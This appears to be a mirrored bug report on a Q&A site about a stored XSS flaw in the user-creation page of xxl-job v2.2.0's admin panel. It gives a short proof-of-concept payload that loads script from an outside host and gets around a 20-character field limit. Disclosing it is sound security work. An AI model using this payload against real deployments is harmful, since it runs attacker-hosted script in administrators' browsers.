xxl-job v2.2.0 Add User Stored XSS vulnerabilities . Escape 20 length limit

scyqe7ek  于 2021-11-29  发布在  Java
关注(0)|答案(0)|浏览(199)

Please answer some questions before submitting your issue. Thanks!

Which version of XXL-JOB do you using?

v2.2.0

Expected behavior

Add User。

Actual behavior

Add User Stored XSS vulnerabilities . Escape 20 length limit

Steps to reproduce the behavior

url:https://github.com/xuxueli/xxl-job/blob/master/xxl-job-admin/src/main/java/com/xxl/job/admin/controller/UserController.java

poc: <script/src=//14.rs>

The page automatically loads and triggers XSS

Other information

Restoration suggestions:

xxl-job

暂无答案!

目前还没有任何答案,快来回答吧!

我来回答

相关问题

    查看更多

    热门标签

    更多
    JavaquerypythonNode开发语言requestUtil数据库Table后端算法LoggerMessageElementParser

    最新问答

    更多
    • 蜀ICP备2022004421号-2 NULL123 https://www.null123.com © All rights reserved
    • 本站内容来源互联网,如果侵犯您的权益请联系我们删除, 联系方式:448109455@qq.com